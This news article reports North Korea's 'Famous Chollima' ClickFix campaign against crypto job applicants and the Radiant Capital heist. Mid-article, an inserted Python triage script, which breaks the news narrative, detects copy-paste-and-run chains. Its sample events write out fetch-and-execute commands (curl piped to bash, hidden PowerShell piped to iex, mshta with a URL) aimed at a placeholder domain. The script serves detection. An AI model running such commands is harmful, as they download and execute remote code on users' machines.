
North Korea targeting Indian crypto job applicants with malware

Job applicants in the cryptocurrency and blockchain industry are being targeted by North Korean hackers seeking to infect the devices of potential new hires and steal their data. 

Researchers at Cisco Talos said they found a North Korean group dubbed “Famous Chollima” running a campaign since mid-2024 targeting a small number of people primarily based in India. 

The group is creating fake employers and getting real software engineers, marketing employees, designers and others to visit skill-testing pages in order to move forward with their applications. 

“Based on the advertised positions, it is clear that the Famous Chollima is broadly targeting individuals with previous experience in cryptocurrency and blockchain technologies,” Cisco Talos explained in a blog on Wednesday. 

“The skill-testing sites attempt to impersonate real companies such as Coinbase, Archblock, Robinhood, Parallel Studios, Uniswap and others, which helps with the targeting.”

Victims are sent an invite code to a testing website where they are expected to enter their details and answer questions about their skills. Applicants are then asked to record a video for interviewers. 

When the person approves camera access to the site, it displays instructions asking the applicant to copy and paste code onto their computer — purportedly to install something for the video. 

Cisco Talos called the malware “PylangGhost” and said it was used exclusively by Famous Chollima. The tactic, known as “ClickFix,” exploits people's instinct to solve problems: a fake error message or prompt instructs the target to fix the issue by copying, pasting and launching commands that ultimately download the malware.
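The ClickFix chain described above leaves a recognisable trace in process-creation telemetry: a shell or interpreter launched from a user context, a download tool in the command line, and the result piped straight into an interpreter, often with hidden-window or execution-policy-bypass flags. The script below is an added example written for this article, not Cisco Talos code, and it carries no PylangGhost indicators. It scores constructed macOS and Windows process events against a few generic heuristics; the rule weights, the `example.invalid` domain and the hostnames are all assumptions made for illustration.

```python
"""Heuristic triage of process-creation events for ClickFix-style
copy/paste-and-run chains (download -> pipe into an interpreter, hidden or
bypass flags, or a living-off-the-land binary pointed at a URL).

Added example for this article; not Cisco Talos code and not based on any
PylangGhost indicator. Every event below is constructed, using the reserved
domain example.invalid in place of any real infrastructure.
"""
import re
from typing import Iterable

# (rule name, compiled pattern, weight). Weights are an illustrative tuning choice.
RULES = [
    ("remote_fetch",
     re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest|DownloadString|DownloadFile"
                r"|certutil(\.exe)?\s+-urlcache)\b", re.I), 1),
    ("pipe_to_interpreter",
     re.compile(r"\|\s*(bash|sh|zsh|iex|Invoke-Expression|python3?|perl)\b", re.I), 2),
    ("hidden_or_bypass",
     re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass"
                r"|-nop\b|-noprofile\b|-enc(odedcommand)?\b", re.I), 1),
    ("lolbin_with_url",
     re.compile(r"\b(mshta|rundll32|regsvr32)(\.exe)?\b.*https?://", re.I), 2),
    ("url_present", re.compile(r"https?://", re.I), 1),
]

# An interpreter whose parent is explorer.exe usually means the user typed or
# pasted into the Win+R dialog, which is how ClickFix lures tell victims to run
# the command. Developers running things from a terminal are not penalised.
INTERPRETERS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript")

# Constructed sample events (hostnames and URLs are fictitious).
SAMPLE_EVENTS = [
    {"host": "dev-mac-01", "parent": "Terminal",
     "cmdline": "curl -fsSL https://example.invalid/setup.sh | bash"},
    {"host": "dev-win-07", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -w hidden -nop -ep bypass -c '
                '"iwr https://example.invalid/a.ps1 -UseBasicParsing | iex"'},
    {"host": "dev-win-07", "parent": "explorer.exe",
     "cmdline": "mshta.exe https://example.invalid/fix.hta"},
    {"host": "dev-mac-02", "parent": "Terminal",
     "cmdline": "curl -O https://example.invalid/report.pdf"},   # download only
    {"host": "dev-mac-02", "parent": "Terminal", "cmdline": "git pull origin main"},
    {"host": "dev-win-03", "parent": "cmd.exe", "cmdline": "python -m pip install requests"},
]


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, matched rule names) for one process-creation event."""
    cmd = event["cmdline"]
    score, hits = 0, []
    for name, pattern, weight in RULES:
        if pattern.search(cmd):
            score += weight
            hits.append(name)
    tokens = cmd.split()
    first_token = tokens[0].lower() if tokens else ""
    if event.get("parent", "").lower() == "explorer.exe" and first_token.startswith(INTERPRETERS):
        score += 1
        hits.append("interpreter_from_explorer")
    return score, hits


def triage(events: Iterable[dict], threshold: int = 3) -> list[dict]:
    """Flag events whose score reaches the threshold; one record per flagged event."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append({"host": ev["host"], "cmdline": ev["cmdline"],
                            "score": score, "rules": hits})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['host']:<11} score={hit['score']} rules={','.join(hit['rules'])}")
        print(f"            {hit['cmdline']}")
```

With the default threshold of 3, the plain `curl -O` download of a PDF scores 2 and is not flagged: fetching a file is routine, and the signal in ClickFix is the fetch being fed directly into `bash`, `iex` or an HTA host in one command. In a real deployment the same scoring would run over EDR or Sysmon event 1 / macOS Endpoint Security process-exec records rather than the inline list.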

The hackers created versions of the malware for macOS and Windows that allow them to steal stored browser credentials, session cookies and other data from various browser extensions. 

Famous Chollima and other groups have been heavily involved in Pyongyang’s efforts to get North Koreans hired at American and European tech firms. The government earns money from its citizens’ salaries and from cryptocurrency thefts enabled by their infiltration of blockchain firms. U.S. law enforcement believes North Korea’s military brings in billions of dollars through the schemes.

The campaign observed by Cisco Talos resembles other North Korean efforts to infect job seekers with malware in order to gather information on the attributes of successful applicants in the crypto space, data that could help North Korea get its own citizens hired. 

There is also evidence of North Korean hackers infecting applicant devices that can then be accessed later, once the person is hired at a legitimate cryptocurrency company. In December, the crypto platform Radiant Capital said a $50 million heist by North Korean hackers began when a PDF laced with malware was sent to its engineers. 

The threat actor pretended to be a former contractor for the company, asking officials to read through a report on another recent cybersecurity incident affecting a different cryptocurrency company. The Radiant Capital developers were sent a link to a ZIP file with a PDF inside that contained a sophisticated piece of malware called INLETDRIFT, a backdoor used to infect macOS devices. 

Since 2023, experts have warned that cryptocurrency industry officials with MacBooks are prime targets for North Korea. 

Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.